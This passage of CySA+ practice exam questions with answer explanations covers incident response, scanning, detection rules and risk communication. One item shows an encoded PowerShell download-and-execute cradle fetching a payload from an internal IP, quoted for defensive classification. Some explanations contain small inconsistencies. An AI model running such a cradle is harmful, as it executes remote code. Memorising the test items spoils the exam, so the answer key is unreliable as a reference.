B.Capture a memory dump of the domain controller for offline analysis.
C.Power down the domain controller to prevent further damage.
D.Reset the password for the local Administrator account and revoke the user's access.
AnswerA

Isolating the domain controller by disabling its network interface is the immediate priority in a suspected compromise. This action effectively contains the threat, preventing the attacker from further lateral movement, exfiltrating data, or causing additional damage across the network. Crucially, it preserves the system's current volatile state and disk evidence for subsequent forensic analysis, allowing investigators to understand the attack vector and scope. This containment strategy is a fundamental step in the incident response lifecycle.

Why this answer

Isolating the domain controller by disabling its network interface is the best first step because it immediately halts any ongoing malicious communication (e.g., C2 traffic over TCP 443) while preserving the volatile state of the system for forensic acquisition. This action prevents further data exfiltration or lateral movement without destroying evidence like memory or logs, which would occur with a power-down. It also aligns with the CISO's requirement for swift containment without losing forensic evidence.

Exam trap

CompTIA often tests the distinction between containment and forensic preservation, trapping candidates who choose memory capture (Option B) as a first step instead of immediate isolation, or who mistakenly think powering down (Option C) preserves evidence when it actually destroys volatile data.

How to eliminate wrong answers

Option B is wrong because capturing a memory dump is a forensic step that should follow containment, not precede it; performing it first could allow the attacker to continue exfiltrating data or executing commands while the dump is taken. Option C is wrong because powering down the domain controller destroys volatile evidence (e.g., memory, active network connections) and may trigger anti-forensic mechanisms, violating the requirement to preserve forensic evidence. Option D is wrong because resetting the password and revoking access does not stop the active malicious process (PowerShell connecting to 203.0.113.5) or the potential persistence mechanism; it only addresses the compromised credential, leaving the threat active.

178
Multi-Selectmedium

A tabletop exercise reveals that no one knows who can approve public statements. What should be updated? (Choose two.)

Select 2 answers
A.The office seating plan only
B.Contact list and escalation matrix
C.The malware signature database only
D.Incident communication plan with named approval roles
AnswersB, D

A contact list and escalation matrix is a critical incident response document that explicitly outlines key personnel, their contact information, and the hierarchical path for decision-making and approvals. This matrix clearly defines who needs to be informed and, crucially, who possesses the authority to approve specific actions or communications at each stage of an incident. It directly addresses the problem of unknown approval authority by providing a structured, actionable guide for incident responders.

Why this answer

The tabletop exercise revealed a gap in the incident response process: no one knows who can approve public statements. This is a procedural and communication failure, not a technical one. Updating the incident communication plan with named approval roles (Option D) directly addresses this by defining the specific person or role authorized to speak publicly.

The contact list and escalation matrix (Option B) must also be updated to ensure the correct approver can be reached quickly, as it provides the hierarchical path and contact details needed to execute the plan.

Exam trap

The CS0-004 exam often tests the distinction between technical controls (like signature databases) and procedural/communication controls (like approval roles and contact lists), trapping candidates who confuse operational security tools with incident management processes.

179
MCQeasy

An organization is implementing an incident response plan. Which phase of the NIST SP 800-61 lifecycle includes activities such as creating policies, establishing IR teams, and acquiring necessary tools?

A.Containment, Eradication, and Recovery
B.Detection and Analysis
C.Preparation
D.Post-Incident Activity
AnswerC

Preparation is the foundational phase of the NIST incident response lifecycle that occurs before any security event begins. It involves establishing incident response capabilities, drafting playbooks, training personnel, securing communication channels, and deploying defensive tools. Implementing the incident response plan itself is a core component of this proactive readiness phase.

Why this answer

Preparation involves all proactive measures to enable effective incident response, including policy, team, and tool readiness.

180
MCQhard

During a post-incident review, the team identifies that the incident response plan was not followed correctly due to unclear communication channels. Which recommendation BEST addresses this issue?

A.Update the incident response plan to define specific communication channels and escalation paths
B.Implement multi-factor authentication for all accounts
C.Replace the current SIEM tool with a faster one
D.Conduct more frequent vulnerability scans
AnswerA

Post-incident reviews (PIRs) often highlight breakdowns in coordination and reporting. Updating the incident response plan (IRP) to explicitly detail communication protocols, designated channels (such as out-of-band messaging), and escalation matrices directly addresses these organizational bottlenecks. This ensures that future incidents are handled with clear lines of authority and minimal delay.

Why this answer

The root cause identified in the post-incident review is unclear communication channels, which directly violates the communication and escalation procedures defined in the incident response plan. Updating the plan to specify exact communication channels (e.g., dedicated Slack channel, email distribution list, or phone tree) and escalation paths (e.g., tier-1 analyst → SOC manager → CISO) ensures that all team members know how and when to communicate during an incident, preventing delays and miscoordination.

Exam trap

The CS0-004 exam often tests the distinction between procedural improvements (like updating the IR plan) versus technical controls (like MFA or SIEM upgrades), and the trap here is that candidates mistakenly choose a technical solution (e.g., faster SIEM) when the root cause is a process/communication failure.

How to eliminate wrong answers

Option B is wrong because multi-factor authentication (MFA) is an access control mechanism that strengthens authentication but does not address communication channel clarity or escalation paths during incident response. Option C is wrong because replacing the SIEM tool with a faster one focuses on detection speed and log analysis performance, not on the procedural communication failures identified in the review. Option D is wrong because conducting more frequent vulnerability scans improves proactive threat identification and patch management, but it does not resolve the operational breakdown in how the team communicates and escalates during an active incident.

181
MCQeasy

A small business with 50 employees uses a single Windows Server 2019 as a domain controller and file server. The company recently experienced a ransomware attack that encrypted all files on the server. The IT manager restored the files from a backup that was taken two days before the attack. However, the next day, the files were encrypted again. The analyst suspects the ransomware may have persisted or re-entered. The network is air-gapped from the internet, but employees use USB drives. Which of the following is the MOST likely reason for the re-infection?

A.The backup itself contained the ransomware.
B.An employee inserted an infected USB drive after the restoration.
C.The ransomware was still active in memory on the server.
D.The domain controller was not fully patched.
AnswerB

This is the most plausible explanation for a re-infection following a successful restoration from a clean backup. After a system is restored, it often operates in a vulnerable state, potentially with reduced network connectivity or security controls temporarily relaxed for validation. An employee inserting an infected USB drive directly into the server or a connected workstation provides a direct, physical vector for malware re-introduction, bypassing network perimeter defenses that might have been re-established. This action re-establishes the infection chain.

Why this answer

The network is air-gapped from the internet, leaving USB drives as the primary vector for reintroducing malware. If an employee inserted an infected USB drive after the restoration, the ransomware could execute and re-encrypt the files. The air-gap eliminates internet-based re-entry, and the backup was clean since it restored files without immediate re-encryption until the next day.

Exam trap

The trap here is that candidates may assume the backup was infected (Option A) or that patching (Option D) is the root cause, but the air-gap and USB vector point directly to physical media reintroduction, not network-based persistence or patch status.

How to eliminate wrong answers

Option A is wrong because if the backup contained the ransomware, the files would have been encrypted immediately upon restoration, not the next day. Option C is wrong because ransomware that persists only in memory would be wiped by a server reboot during the restoration process, and it cannot survive a reboot without writing to disk. Option D is wrong because while an unpatched domain controller is a security risk, the air-gapped network prevents remote exploitation, and the attack vector is local via USB drives, not network-based patching issues.

182
MCQhard

During an active incident, a security analyst discovers that the attacker has exfiltrated data. The analyst must communicate this to the incident response team. Which method of communication is MOST appropriate?

A.Update the incident ticket and wait for the team to review
B.Send a detailed email to the incident response team
C.Use a predefined secure messaging channel or phone call to escalate
D.Post the information on a public forum for awareness
AnswerC

Active incidents require immediate, synchronous communication to coordinate containment efforts and share threat intelligence rapidly. Utilizing out-of-band, pre-established secure channels (such as encrypted chat or direct phone lines) ensures that the escalation is received instantly by the correct personnel without alerting the adversary who may be monitoring the primary network.

Why this answer

During an active incident, speed and security are critical. A predefined secure messaging channel or phone call ensures immediate, confidential communication without the delays or exposure risks of email or ticketing systems. This aligns with NIST SP 800-61 incident response guidelines, which prioritize real-time, out-of-band communication for sensitive updates.

Exam trap

CompTIA often tests the misconception that email or ticketing systems are sufficient for urgent incident communication, when in fact they lack the speed, security, and out-of-band nature required during an active data exfiltration event.

How to eliminate wrong answers

Option A is wrong because updating an incident ticket and waiting introduces unacceptable latency; the team may not see it promptly, and the ticket system could be monitored by the attacker. Option B is wrong because email is not real-time and can be intercepted, delayed, or logged, violating the need for secure, immediate escalation during an active breach. Option D is wrong because posting on a public forum violates confidentiality and could alert the attacker or expose sensitive data, directly contradicting incident response protocols.

183
MCQmedium

After a risk assessment, a security analyst recommends accepting a low-risk finding. The system owner disagrees. Which communication strategy should the analyst use?

A.Escalate the disagreement to the CISO immediately
B.Agree with the system owner and change the recommendation
C.Present the risk assessment data and cost-benefit analysis to justify acceptance
D.Insist that the finding must be mitigated due to policy
AnswerC

Presenting the comprehensive risk assessment data, including the identified threats, vulnerabilities, likelihood, and impact, alongside a detailed cost-benefit analysis for various treatment options, is the most effective approach. This allows stakeholders, including the system owner, to make an informed, data-driven decision regarding risk acceptance, ensuring transparency and alignment with business objectives. It facilitates a collaborative understanding of why acceptance is the appropriate strategy, based on objective facts rather than subjective opinions.

Why this answer

The security analyst should use data-driven communication to resolve disagreements over risk acceptance. By presenting the risk assessment data and a cost-benefit analysis, the analyst provides objective evidence that the low-risk finding does not warrant mitigation, aligning with the NIST risk management framework's emphasis on informed decision-making. This approach respects the system owner's concerns while justifying the acceptance based on technical and business rationale.

Exam trap

The trap here is that candidates may choose immediate escalation (A) or policy insistence (D) because they confuse risk acceptance with risk avoidance, failing to recognize that data-driven justification is the standard professional approach for resolving such disagreements.

How to eliminate wrong answers

Option A is wrong because immediately escalating to the CISO bypasses collaborative resolution and may be seen as adversarial, which is not the first step in a professional disagreement over a low-risk finding. Option B is wrong because agreeing and changing the recommendation without justification undermines the risk assessment process and could lead to unnecessary resource expenditure or overlooked risks. Option D is wrong because insisting on mitigation due to policy ignores the risk assessment's conclusion that the finding is low-risk, and policy often allows for risk acceptance when justified by data.

184
MCQhard

An EDR agent reports that the process 'svchost.exe' spawned 'powershell.exe' with the command line: 'powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwAC8AcABhAHkAbABvAGEAZAAuAGUAeABlACcAKQA='. Which of the following is the most appropriate classification for this activity?

A.True positive - but only if the IP is confirmed malicious
B.False positive - encoded commands are used by system administrators
C.False positive - svchost.exe commonly launches PowerShell for legitimate tasks
D.True positive - likely malicious activity using a LOLBin
AnswerD

This is a true positive because the execution represents a classic Living off the Land (LotL) attack where a legitimate system binary (powershell.exe) is leveraged to bypass security controls. The parent-child relationship of svchost.exe spawning PowerShell with encoded arguments is a highly reliable indicator of compromise (IoC) pointing to privilege escalation or lateral movement.

Why this answer

The encoded command decodes to 'IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.10/payload.exe')', which is a download cradle. Svchost.exe spawning PowerShell with such a command is highly suspicious and indicative of a true positive.

185
MCQeasy

A DAST scan cannot reach authenticated pages of a web application and reports only public content findings. What should be configured to enable the scan to test authenticated pages?

A.Treat absence of findings as proof of security
B.Authenticated scanning with a test account and session handling
C.Reduce the scan to only the landing page
D.Disable all application authentication
AnswerB

DAST needs valid authentication and session management to test protected functionality.

Why this answer

DAST scanners require authenticated sessions to crawl and test pages behind login forms. Without session handling (e.g., cookies, tokens), the scanner only sees public content. Configuring authenticated scanning with a test account and proper session management (e.g., OWASP ZAP's session handling rules or Burp Suite's authentication pre-script) allows the scanner to maintain state and reach restricted pages, enabling full coverage of the application's attack surface.

Exam trap

The trap here is that candidates may think 'no findings' means the application is secure, but the CompTIA CySA+ exam tests the understanding that DAST results are only as good as the scope of pages the scanner can actually reach, and that authenticated scanning is mandatory for comprehensive testing.

How to eliminate wrong answers

Option A is wrong because treating an absence of findings as proof of security ignores the possibility that unauthenticated scans miss critical vulnerabilities in protected areas, leading to a false sense of security. Option C is wrong because reducing the scan to only the landing page deliberately avoids testing the authenticated portions of the application, which is the opposite of the required action and would leave high-risk areas untested.

186
Multi-Selecthard

A remediation report shows repeated SLA breaches by one business unit. Which recommendations are appropriate? (Choose two.)

Select 2 answers
A.Automatically accept all future risk permanently
B.Review ownership, resourcing, and change-window constraints
C.Hide the business unit from future reports
D.Create an agreed corrective action plan with dates
AnswersB, D

Persistent SLA breaches usually stem from underlying operational bottlenecks rather than simple negligence. Investigating who owns the system, whether the team has adequate staff and tools, and if restrictive maintenance windows prevent timely patching allows security analysts to identify and resolve the root causes of remediation delays.

Why this answer

Reviewing ownership, resourcing, and change-window constraints directly addresses the root causes of repeated SLA breaches. SLA breaches often stem from inadequate staffing, misaligned change windows, or unclear ownership of remediation tasks, not from technical failures alone. This recommendation aligns with the reporting and communication domain's emphasis on actionable, root-cause analysis rather than superficial fixes.

Exam trap

The CS0-004 exam often tests the misconception that hiding or ignoring non-compliant data is an acceptable reporting strategy, when in fact the exam emphasizes transparency and root-cause analysis as the only valid path to remediation.

187
Multi-Selectmedium

A detection engineer is writing a Sigma rule for suspicious rundll32 usage. Which fields should be included? (Choose two.)

Select 2 answers
A.Command line containing unusual DLL path or URL pattern
B.Desk phone extension
C.Laptop battery health
D.Image or process name matching rundll32.exe
AnswersA, D

For rundll32.exe, the command-line arguments are paramount for distinguishing legitimate system operations from malicious activity. Attackers frequently leverage rundll32.exe to execute arbitrary DLLs, often from unusual or temporary paths, or even to initiate network connections to command-and-control (C2) servers via embedded URLs. Detecting these anomalous patterns within the command line is a high-fidelity indicator of compromise, as it directly reveals the attacker's intended payload or communication channel. This approach effectively identifies abuse of a legitimate binary.

Why this answer

Sigma rules for suspicious rundll32 usage focus on detecting abnormal command-line arguments, such as DLL paths from unusual locations (e.g., temp directories, network shares) or URLs that indicate remote payload retrieval. The 'Command line' field is critical because rundll32.exe is a legitimate Windows binary often abused by attackers to execute malicious DLLs, and anomalous patterns in its arguments are a strong indicator of compromise.

Exam trap

The CS0-004 exam often tests the distinction between relevant process-level telemetry (command line, parent process) and irrelevant hardware or peripheral data, so candidates must recognize that Sigma rules are strictly for log-based detection of execution artifacts, not system health or inventory fields.

188
Multi-Selectmedium

A security analyst is investigating a potential data breach. The analyst needs to collect digital evidence while preserving its integrity. Which TWO actions should the analyst take? (Choose TWO.)

Select 2 answers
A.Run a full antivirus scan on the system.
B.Delete any malicious files found during the investigation.
C.Verify the hash of the acquired image against the original.
D.Use a write blocker when imaging the hard drive.
E.Connect the suspect drive to a forensic workstation without a write blocker.
AnswersC, D

Computing a one-way cryptographic hash (such as SHA-256) of the original drive before acquisition and of the forensic image after, then comparing the two digests, is the definitive test that the image is a bit-for-bit clone with no changes introduced during capture. A matching hash validates the image for court admissibility and provides a baseline for later re-verification as part of the chain of custody.

Why this answer

Option C is correct because verifying the hash (e.g., MD5 or SHA-256) of the acquired forensic image against the original source confirms that the copy is bit-for-bit identical and has not been altered, which is essential for maintaining evidence integrity and admissibility. Option D is correct because using a hardware or software write blocker when imaging the hard drive prevents any write operations to the suspect drive, ensuring the original evidence remains unmodified during acquisition. Option A is incorrect because running a full antivirus scan modifies system state, timestamps, and potentially quarantines or alters files, which contaminates evidence.

Option B is incorrect because deleting malicious files destroys evidence and violates chain-of-custody and preservation principles. Option E is incorrect because connecting a suspect drive without a write blocker allows the forensic workstation's OS to write to the drive, altering metadata and compromising evidentiary integrity.

Exam trap

CS0-004 often tests the misconception that antivirus scanning or deleting malware is part of evidence collection — candidates must recognize that any action that modifies the system destroys evidence integrity.

189
Multi-Selecteasy

An organization's incident response team is classifying an incident based on severity and priority. Which TWO factors should the team consider when determining the priority of an incident? (Select TWO.)

Select 2 answers
A.The number of users reporting the issue.
B.The potential business impact of the incident.
C.The criticality of the affected systems or data.
D.The time of day the incident occurred.
E.The type of threat actor involved.
AnswersB, C

The potential business impact of an incident drives its priority because the goal of incident management is to minimize harm to the organization. Impact includes financial loss, operational disruption, regulatory fines, reputational damage, and customer trust. A high-impact incident, such as a ransomware attack on a core revenue system, necessitates immediate escalation regardless of other factors.

Why this answer

Option B is correct because incident priority is driven primarily by the potential business impact — how severely the incident could disrupt operations, revenue, reputation, or regulatory obligations — which determines how urgently the response must be escalated. Option C is correct because the criticality of the affected systems or data (for example, a domain controller, PII database, or payment processing system) directly shapes priority, since a compromise of high-value assets warrants faster and more aggressive response than one on a low-value endpoint. Together, business impact and asset criticality are the standard inputs for priority scoring in frameworks such as NIST SP 800-61, which separates severity (technical impact) from priority (business-driven urgency).

Option A is not a priority factor per se; the number of users reporting an issue may indicate scope but does not by itself establish business urgency. Option D is not a defining factor, since time of day may affect staffing but not the inherent priority of the incident. Option E is also not a priority determinant; the type of threat actor is relevant to threat intelligence and attribution, not to how urgently the business must respond.

Exam trap

CS0-004 often tests the confusion between severity (technical) and priority (business) — candidates pick volume or threat-actor factors when the question asks for business-impact and asset-criticality drivers.

190
Matchingmedium

Match each vulnerability scanning concept to its definition.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Alert on non-existent vulnerability

Missed actual vulnerability

Scan with authenticated access

Scan without authenticated access

Standard severity rating for vulnerabilities

Why these pairings

Understanding these four concepts is critical for interpreting scan results correctly. True positives and true negatives are desirable outcomes, while false positives and false negatives represent errors. Common confusions include swapping true/false positives and negatives, as shown in the distractors.

191
MCQmedium

A vulnerability programme wants to show whether critical findings are fixed within policy timelines. Which report is best? If the primary audience is SOC manager, which content choice is most appropriate?

A.A report sorted only by scanner plugin ID
B.SLA compliance by severity, asset owner, and business unit
C.A list of all closed tickets with no dates
D.A vendor price comparison
AnswerB

SLA compliance by severity, asset owner, and business unit directly evidences whether critical findings were remediated inside policy timelines, and its grouping by owner and unit gives the SOC manager the accountability view they need.

Why this answer

The vulnerability program needs to demonstrate that critical findings are remediated within policy timelines, which requires a report showing SLA compliance. For a SOC manager, the most appropriate content includes severity, asset owner, and business unit breakdowns, enabling them to track accountability and prioritize remediation efforts across the organization.

Exam trap

The CS0-004 exam often tests the distinction between a report that merely lists findings (like sorted by plugin ID) versus one that demonstrates compliance with a policy timeline, and candidates may confuse a technical sort with a business-oriented SLA report.

How to eliminate wrong answers

Option A is wrong because sorting by scanner plugin ID only groups findings by technical signature, not by severity or SLA status, so it cannot show whether critical findings are fixed within policy timelines. Option C is wrong because a list of all closed tickets with no dates lacks any temporal context, making it impossible to determine if remediation met policy deadlines. Option D is wrong because a vendor price comparison is irrelevant to vulnerability remediation tracking and SLA compliance reporting.

192
MCQmedium

An analyst is using YARA to create rules for detecting a specific malware strain. Which of the following pieces of information is MOST useful for writing a YARA rule?

A.The malware's file size.
B.The date the malware was first seen.
C.A unique string within the malware.
D.The malware's MD5 hash.
AnswerC

YARA is primarily a pattern-matching tool designed to identify malware families based on textual or hexadecimal patterns. Defining unique strings, such as specific registry keys, user-agent strings, or unique function names within the rule's string section, allows the engine to reliably flag files belonging to that specific malware family.

Why this answer

YARA rules are based on patterns in the file, such as strings and byte sequences. A unique string found in the malware sample can be used to create a rule that identifies the malware.

193
MCQmedium

A cloud posture scan finds a storage bucket with public read access containing customer exports. What should the team do first? For validation, Which action should be taken before closing or downgrading the finding?

A.Wait for the next quarterly review
B.Rotate database administrator passwords only
C.Delete all audit logs to reduce liability
D.Restrict public access and determine whether sensitive data was accessed
AnswerD

The immediate priority is to restrict public access to the storage bucket, effectively containing the data exposure and preventing further unauthorized access. Following containment, it is crucial to conduct a thorough investigation to determine if sensitive data was present in the bucket and whether it was accessed or exfiltrated during the period of public exposure. This two-pronged approach aligns with incident response best practices, focusing on mitigation and subsequent impact assessment.

Why this answer

The immediate priority is to restrict public read access to the storage bucket to prevent further unauthorized exposure, then determine whether sensitive customer data was accessed by reviewing access logs (e.g., AWS CloudTrail or S3 server access logs). This aligns with incident response best practices: contain the threat first, then assess impact. Without confirming data access, the team cannot properly scope the breach or notify affected parties.

Exam trap

CompTIA often tests the misconception that rotating credentials (Option B) is the primary fix for a misconfiguration, when the actual first step is to remove the public access and investigate exposure.

How to eliminate wrong answers

Option A is wrong because waiting for the next quarterly review violates incident response principles; a public bucket with customer exports requires immediate containment, not delayed action. Option B is wrong because rotating database administrator passwords does not address the root cause—public read access on a storage bucket—and is irrelevant to the misconfiguration. Option C is wrong because deleting audit logs destroys forensic evidence needed to determine if sensitive data was accessed, which could violate compliance requirements (e.g., GDPR, HIPAA) and hinder investigation.

194
MCQmedium

An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?

A.Domain generation algorithm (DGA)
B.Lateral movement
C.Data exfiltration
D.Normal backup activity
AnswerC

Data exfiltration involves the unauthorized transfer of sensitive information from an internal network to an external, attacker-controlled destination. In NetFlow analysis, this is typically flagged by an anomalous, large-volume outbound connection (north-south traffic) originating from an internal host to an unfamiliar external IP address, especially outside of normal business hours.

Why this answer

The data transfer is large, to an external IP, on an encrypted port, outside business hours, and from a server that shouldn't initiate outbound connections. This strongly suggests data exfiltration.

195
Multi-Selecthard

Which THREE of the following are common indicators of a data exfiltration attempt? (Choose three.)

Select 3 answers
A.Outbound connections to IP addresses associated with known C2 servers
B.DNS queries with high entropy subdomains
C.Increased use of encrypted communication protocols
D.Unusually large outbound data transfers during off-hours
E.Multiple failed login attempts from a single source
AnswersA, B, D

Outbound traffic to IP addresses matching known command-and-control infrastructure is a direct indicator that a compromised host is actively communicating with attacker-controlled systems, which is frequently the channel used to receive further instructions or stage stolen data before it leaves the network, making C2 IP matches a high-confidence exfiltration signal when correlated with threat intelligence feeds.

Why this answer

Outbound connections to IP addresses associated with known command-and-control (C2) servers are a classic indicator of data exfiltration. Once an attacker establishes a C2 channel, they can use it to tunnel stolen data out of the network. Security tools like firewalls and threat intelligence feeds flag these connections based on known malicious IP addresses or domains.

Exam trap

CompTIA often tests the distinction between indicators of exfiltration (data leaving) versus indicators of initial access or lateral movement, so candidates may confuse failed logins (Option E) with exfiltration when it actually points to a different phase of the attack chain.

196
Multi-Selecteasy

Which TWO of the following are key components of an incident communication plan?

Select 2 answers
A.Escalation contact list
B.Pre-approved public statements or scripts
C.Network topology diagrams
D.Encryption keys for secure communications
E.System event logs
AnswersA, B

An escalation contact list is a foundational element of an incident communication plan, defining the specific internal and external stakeholders to notify as an incident's severity or impact increases. It establishes clear lines of authority, contact methods, and backup personnel to prevent communication bottlenecks during high-pressure response phases.

Why this answer

An incident communication plan must include an escalation contact list (A) to ensure that the right stakeholders—such as the incident response team, legal counsel, and executive management—are notified promptly based on the severity of the incident. Pre-approved public statements or scripts (B) are critical to maintain consistent, accurate, and legally vetted messaging to external parties (e.g., customers, media, regulators) during a crisis, preventing unauthorized disclosures that could worsen the situation.

Exam trap

CompTIA often tests the distinction between operational/forensic artifacts (like network diagrams, logs, or encryption keys) and the structured communication components (contacts and scripts) that are explicitly defined in the incident communication plan, leading candidates to mistakenly include technical tools as part of the plan.

197
MCQeasy

A security analyst is using the EPSS to prioritize vulnerabilities for remediation. EPSS is designed to estimate the likelihood that a vulnerability will be exploited in the wild. Which of the following best describes how EPSS should be used in vulnerability management?

A.EPSS is only relevant for high-severity vulnerabilities with a CVSS score above 9.0.
B.EPSS replaces the need for vulnerability scanning because it predicts exploitability.
C.EPSS alone should determine the remediation order, ignoring asset criticality.
D.EPSS should be used as one of several factors in a risk-based prioritization approach.
AnswerD

Modern vulnerability management relies on risk-based prioritization, which integrates threat intelligence, asset value, and vulnerability severity. EPSS provides a dynamic, data-driven estimate of exploit probability in the wild, which helps analysts filter out thousands of vulnerabilities that are unlikely to ever be leveraged. When combined with CVSS severity and internal asset criticality, EPSS enables security teams to allocate remediation resources to the highest-risk areas first.

Why this answer

EPSS provides a probability score (0-1) that a vulnerability will be exploited in the wild within 30 days. It should be used alongside other factors like asset criticality and business context for prioritization.

198
MCQhard

A security analyst is evaluating a containerized application for vulnerabilities. The analyst runs Trivy on the container image and finds several high-severity vulnerabilities in the base image. Which of the following is the most effective remediation strategy?

A.Use a runtime security tool to monitor the container
B.Apply a host-based firewall to block exploitation attempts
C.Rebuild the image using a patched base image and redeploy
D.Disable the container until a patch is available
AnswerC

Containers are designed to be immutable, meaning that patching a running instance directly is a major operational anti-pattern. The correct remediation workflow requires updating the Dockerfile or base image to a secure version, rebuilding the container image, and redeploying it to eliminate the vulnerabilities at their source.

Why this answer

Rebuilding the container image with a patched base image addresses the root cause by eliminating vulnerable components.

199
MCQhard

A security analyst is investigating a Kubernetes cluster and finds that a container is running with securityContext.privileged: true. The container also has a hostPath mount that allows writing to the host filesystem. Which of the following best describes the primary risk of this configuration?

A.The container can only read host files, but not modify them.
B.The container can only affect other containers in the same pod, not the host.
C.The container can be used to launch a denial-of-service attack on the Kubernetes API server.
D.The container can break out of the container environment and gain root access to the host node.
AnswerD

Running a container in privileged mode grants it nearly all capabilities of the host's root user, disabling Linux namespaces and cgroups protections. When paired with a hostPath mount, an attacker can easily escape the container boundaries, access the host's sensitive system files, and execute arbitrary commands with root privileges on the underlying node.

Why this answer

A privileged container with hostPath mount can escape the container and compromise the host. The container can access host resources, potentially allowing full host compromise.

200
MCQmedium

A scan of Windows servers reports few findings, but the scanner used no credentials. The security manager suspects missing patch data. What should be changed to validate the findings before closing or downgrading them?

A.Run authenticated scans using least-privilege scanner credentials
B.Trust the unauthenticated result as complete
C.Disable host firewalls permanently
D.Increase only the port range
AnswerA

Authenticated scanning gives the scanner access to installed software and patch state, improving accuracy.

Why this answer

Unauthenticated scans rely on network-level probes and can only detect vulnerabilities visible without credentials, such as open ports or banner information. Patch status for Windows servers requires authenticated access to query the registry, WMI, or the Windows Update API. Using least-privilege scanner credentials enables the scanner to perform authenticated checks, revealing missing patches that were previously hidden.

Exam trap

The CS0-004 exam often tests the misconception that unauthenticated scans are sufficient for vulnerability management, when in fact they miss the majority of patch-related findings that require credentialed access.

How to eliminate wrong answers

Option B is wrong because trusting an unauthenticated result as complete ignores the fundamental limitation that uncredentialed scans cannot assess patch levels, leading to a false sense of security. Option C is wrong because permanently disabling host firewalls would expose the servers to network-based attacks and violates the principle of defense in depth; firewall rules should be configured to allow scanner traffic, not disabled entirely.

201
MCQeasy

An organization's incident response playbook specifies that after a confirmed malware infection, the infected system should be isolated from the network. Which action best achieves isolation?

A.Uninstall the operating system and reimage.
B.Disable the network interface card (NIC) via software.
C.Pull the power cord from the infected system.
D.Delete the infected user's account.
AnswerB

Disabling the network interface card (NIC) via software, such as through the operating system's network settings or command-line tools, immediately severs the system's network connectivity. This action effectively contains the threat by preventing further propagation or data exfiltration while preserving the system's volatile memory and disk state for subsequent forensic analysis. It is a controlled and reversible method for initial containment.

Why this answer

Disabling the network interface card (NIC) via software immediately stops all network traffic to and from the infected system, effectively isolating it from the network while preserving the system's state for forensic analysis. This action aligns with the incident response playbook's requirement for network isolation without destroying volatile data or evidence.

Exam trap

The CS0-004 exam often tests the distinction between 'isolation' (stopping network communication while preserving the system) and 'eradication' (removing the malware or rebuilding the system), leading candidates to confuse reimaging or power-off actions with proper isolation.

How to eliminate wrong answers

Option A is wrong because uninstalling the OS and reimaging destroys all data on the system, including forensic evidence, and does not achieve immediate network isolation. Option C is wrong because pulling the power cord causes a hard shutdown, which loses volatile memory data (e.g., running processes, network connections) and may prevent proper forensic collection. Option D is wrong because deleting the infected user's account does not stop network traffic from the system itself; the malware can still communicate over the network using other system accounts or services.

202
MCQeasy

A security team is reviewing firewall logs and identifies traffic to a known malicious IP address from an internal workstation running a critical business application that cannot be interrupted. Which of the following is the most appropriate immediate action?

A.Add a firewall rule to block the malicious IP
B.Shut down the workstation
C.Disconnect the network cable
D.Run an antivirus scan
AnswerA

Implementing a new firewall rule to explicitly deny all traffic from the identified malicious IP address is a precise and effective containment strategy. This action operates at the network layer, preventing further unauthorized communication without disrupting legitimate business applications or services running on the affected workstation. It directly addresses the source of the observed malicious activity, isolating the threat while maintaining operational continuity.

Why this answer

Adding a firewall rule to block the malicious IP is the most appropriate immediate action because it stops the outbound traffic to the known malicious address without disrupting the critical business application running on the workstation. This approach maintains availability (a key CIA triad principle) while mitigating the threat at the network layer, which is faster and less invasive than host-level changes. It also preserves the workstation's state for potential forensic analysis.

Exam trap

CompTIA often tests the principle of 'least disruption' in incident response, where candidates mistakenly choose to shut down or disconnect the system (options B or C) because they focus solely on containment, forgetting the critical business application's availability requirement.

How to eliminate wrong answers

Option B is wrong because shutting down the workstation would interrupt the critical business application, violating availability requirements, and could destroy volatile evidence in memory. Option C is wrong because disconnecting the network cable would also interrupt the application's network connectivity, potentially causing service disruption, and does not provide a targeted block against the specific IP. Option D is wrong because running an antivirus scan is a reactive, host-based step that takes time and may not immediately stop ongoing malicious traffic; it also risks alerting an attacker or interfering with the application's processes.

203
MCQhard

A company uses a centralized logging solution. A security analyst receives a log from a host indicating a user account 'jsmith' was created locally on a server. The analyst suspects this is a backdoor account. Which of the following log sources would provide the most context to confirm the creation method and identify the responsible process?

A.Sysmon Event ID 1 (Process creation)
B.Network logs
C.Application logs
D.Windows Security Event Logs (Event ID 4720)
AnswerA

Sysmon Event ID 1 provides highly granular details about process creation, including the executable's full path, command-line arguments, user context, and critically, the parent process that initiated it. This rich contextual information is invaluable for tracing the execution chain and understanding how a new account might have been created, such as via an unusual script or malicious binary. It allows security analysts to quickly identify the root cause and the specific method used for account creation.

Why this answer

Sysmon Event ID 1 captures every process creation event with detailed command-line arguments, parent process information, and hashes. This allows the analyst to see exactly which executable (e.g., net.exe, powershell.exe, or a custom script) created the 'jsmith' user account and what command-line parameters were used, providing definitive evidence of the creation method and responsible process.

Exam trap

CompTIA often tests the distinction between detection (Event ID 4720) and forensic attribution (Sysmon Event ID 1), leading candidates to choose the security log that confirms the event occurred rather than the log that reveals how and by what process it was executed.

How to eliminate wrong answers

Option B is wrong because network logs only show traffic flows and IP addresses, not local process execution or user creation commands. Option C is wrong because application logs record events from specific applications (e.g., IIS, SQL Server) and do not capture system-level process creation or local account management activities. Option D is wrong because Windows Security Event Log 4720 only records that a user account was created, but does not reveal the parent process, command line, or the executable responsible for the creation.

204
MCQhard

An organization has a risk acceptance process for vulnerabilities that cannot be remediated immediately. Which of the following should be documented in the risk acceptance paperwork?

A.The name of the person who discovered the vulnerability
B.Compensating controls, business justification, and expiration date
C.The patch details and installation instructions
D.The CVSS score and exploitability
AnswerB

Correct. A defensible risk acceptance record requires compensating controls that reduce residual risk, a documented business justification explaining why remediation is deferred, and an expiration or review date so the acceptance does not persist indefinitely without reassessment.

Why this answer

Risk acceptance documentation should include compensating controls, business justification, and an expiration date or review period.

205
MCQmedium

During a vulnerability scan of internal hosts, a security analyst finds a critical vulnerability with a CVSS score of 9.8. The affected system is a legacy application that cannot be patched immediately. What should the analyst do next?

A.Increase scan frequency to monitor the vulnerability
